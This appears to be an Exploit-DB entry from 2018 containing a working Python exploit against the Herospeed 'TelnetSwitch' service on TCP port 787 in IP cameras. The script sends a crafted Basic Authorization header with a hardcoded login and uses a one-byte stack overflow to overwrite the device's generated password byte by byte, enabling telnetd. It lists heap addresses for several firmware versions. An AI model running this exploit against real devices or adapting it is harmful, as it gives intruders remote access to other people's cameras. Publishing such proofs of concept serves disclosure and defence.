Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD

EDB-ID:

43997

CVE:

N/A

EDB Verified:

Author:

bashis

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2018-01-22

Vulnerable App: 
#!/usr/bin/env python2.7
#
# Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd.
# Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd.
#
# [Verified]
# 1) Fullhan IPC FH8830_F22_W_7.1.42.1
# 2) Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
# 3) HiSilicon 3518EV200_OV9732_W_7.1.25.1, 3519V100_IMX274_W_7.1.39.3
# 4) Ambarella s2l55m_imx123_W_7.1.25.2, S2E66_IMX178_W_7.1.3.4
#
# Author: bashis <mcw noemail eu>, 2018
#
import socket
import select
import sys
import argparse
import base64
import struct
import time
#
# Validate correctness of HOST, IP and PORT
#
class Validate:

	def __init__(self,verbose):
		self.verbose = verbose

	# Check if IP is valid
	def CheckIP(self,IP):
		self.IP = IP

		ip = self.IP.split('.')
		if len(ip) != 4:
			return False
		for tmp in ip:
			if not tmp.isdigit():
				return False
			i = int(tmp)
			if i < 0 or i > 255:
				return False
		return True

	# Check if PORT is valid
	def Port(self,PORT):
		self.PORT = PORT

		if int(self.PORT) < 1 or int(self.PORT) > 65535:
			return False
		else:
			return True

	# Check if HOST is valid
	def Host(self,HOST):
		self.HOST = HOST

		try:
			# Check valid IP
			socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
			# Now we check if it is correct typed IP
			if self.CheckIP(self.HOST):
				return self.HOST
			else:
				return False
		except socket.error as e:
			# Else check valid DNS name, and use the IP address
			try:
				self.HOST = socket.gethostbyname(self.HOST)
				return self.HOST
			except socket.error as e:
				return False


if __name__ == "__main__":

	INFO =  '\n[Herospeed TelnetSwitch pwn (2018 bashis <mcw noemail eu>)]\n'
	rhost = '192.168.57.20'	# Default Remote HOST
	rport = 787			# Default Remote PORT
	BUFFER_SIZE = 1024

	try:
		arg_parser = argparse.ArgumentParser(
		prog=sys.argv[0],
				description=('[*] '+ INFO +' [*]'))
		arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
		arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ str(rport) +']')
		args = arg_parser.parse_args()
	except Exception as e:
		print INFO,"\nError: {}\n".format(str(e))
		sys.exit(1)

	print INFO
	if args.rport:
		rport = int(args.rport)

	if args.rhost:
		rhost = args.rhost
		IP = args.rhost

	# Check if RPORT is valid
	if not Validate(True).Port(rport):
		print "[!] Invalid RPORT - Choose between 1 and 65535"
		sys.exit(1)

	# Check if RHOST is valid IP or FQDN, get IP back
	rhost = Validate(True).Host(rhost)
	if not rhost:
		print "[!] Invalid RHOST"
		sys.exit(1)

	timeout = 5
	socket.setdefaulttimeout(timeout)

	#
	# [Payload]
	#

	LOGIN = "Lucky787"		# Hardcoded login
	#
	# Fullhan IPC FH8830_F22_W_7.1.42.1
	# Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
	#
	PASSWD = "\n\n\n\n\n\n\n\n\n\n\n\n"	# Our new password, must be exactly 12 char, and must be '\n'
	MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
	BASE64_NULL = "A" * 232 # Decoded as 0x00 with base64 decode
	HEAP_PWD = 0x00016c8c # Start of the dynamicly generated password, located on heap

	#
	# HiSilicon 3518EV200_OV9732_W_7.1.25.1
	#
#	PASSWD = "AAAAAAAAAAAA"	# Our new password, must be exactly 12 char, and must be 'A'
#	MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#	BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
#	HEAP_PWD = 0x00016990 # Start of the dynamicly generated password, located on heap

	#
	# HiSilicon 3519V100_IMX274_W_7.1.39.3
	#
#	PASSWD = "AAAAAAAAAAAA"	# Our new password, must be exactly 12 char, and must be 'A'
#	MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#	BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
#	HEAP_PWD = 0x000267b0 # Start of the dynamicly generated password, located on heap

	#
	# Ambarella s2l55m_imx123_W_7.1.25.2
	#
#	PASSWD = "AAAAAAAAAAAA"	# Our new password, must be exactly 12 char, and must be 'A'
#	MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#	BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
#	HEAP_PWD = 0x00014c3c # Start of the dynamicly generated password, located on heap

	#
	# Ambarella S2E66_IMX178_W_7.1.3.4
	#
#	PASSWD = "AAAAAAAAAAAA"	# Our new password, must be exactly 12 char, and must be 'A'
#	MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#	BASE64_NULL = "A" * 108 # Decoded as 0x00 with base64 decode
#	HEAP_PWD = 0x00014c68 # Start of the dynamicly generated password, located on heap

	MESSAGE = base64.b64encode(bytes(MESSAGE))
	MESSAGE += BASE64_NULL

	#
	# Since the stack overflow writing with only one byte, we need overwrite the password one char at the time (looping twelve times)
	#
	for where in range(0, len(PASSWD)):
		OUT = "GET / HTTP/1.0\nAuthorization: Basic {}{}\n\n".format(MESSAGE,struct.pack('<L',HEAP_PWD)[:3])
		print "Writing to: {}".format(hex(HEAP_PWD))
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((rhost, rport))
		s.send(OUT)
		time.sleep(0.5)
		response = s.recv(BUFFER_SIZE).split()
		HEAP_PWD += 0x1 # Next address on heap

		if response[1]:
			if response[1] == "200":
				print "({}) OK, telnetd should be open!".format(response[1])
				break
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services